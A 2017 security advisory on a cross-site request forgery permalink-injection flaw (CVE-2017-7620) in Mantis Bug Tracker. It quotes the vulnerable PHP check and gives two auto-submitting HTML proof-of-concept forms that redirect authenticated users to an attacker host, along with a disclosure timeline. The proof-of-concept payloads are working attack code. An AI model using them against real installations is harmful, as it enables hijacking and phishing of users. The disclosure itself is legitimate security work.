Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery
来源 作者:hyp3rlinx 发布时间:2017-05-22
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: [+] Source: [+] ISR: ApparitionSec Vendor: ================ Product: ========= Mantis Bug Tracker 1.3.10 / v2.3.0 MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases. Vulnerability Type: ======================== CSRF Permalink Injection CVE Reference: ============== CVE-2017-7620 Security Issue: ================ Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage. Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes. Line: 270 # Check for URL's pointing to other domains if( 0 == $t_type || empty( $t_matches['script'] ) || 3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) { return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php'; } # Start extracting regex matches $t_script = $t_matches['script']; $t_script_path = $t_matches['path']; Exploit/POC: ============= <form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST"> <script>document.forms[0].submit()</script> </form> OR <form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST"> <script>document.forms[0].submit()</script> </form> Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: April 9, 2017 Vendor Release Fix: May 15, 2017 Vendor Disclosed: May 20, 2017 May 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
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